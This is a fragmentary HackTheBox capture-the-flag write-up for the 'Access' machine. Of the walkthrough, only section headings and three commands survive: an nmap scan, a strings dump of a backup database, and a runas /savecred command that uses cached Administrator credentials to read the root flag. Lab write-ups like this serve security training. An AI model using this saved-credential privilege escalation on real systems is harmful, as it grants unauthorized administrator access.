Access — HTB Writeup

Access infocard

Intro

Getting User

nmap -sC -sV -oN access-tcp.scan 10.10.10.98
strings backup.mdb | less

Getting Root

runas /savecred /user:Administrator "c:\windows\system32\cmd.exe /c type \"C:\Users\Administrator\Desktop\root.txt\" > \"C:\Users\security\Desktop\roothash.txt\""

Extras

Conclusion

--

--

CyberSecurity | CTFs | https://blog.ikuamike.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store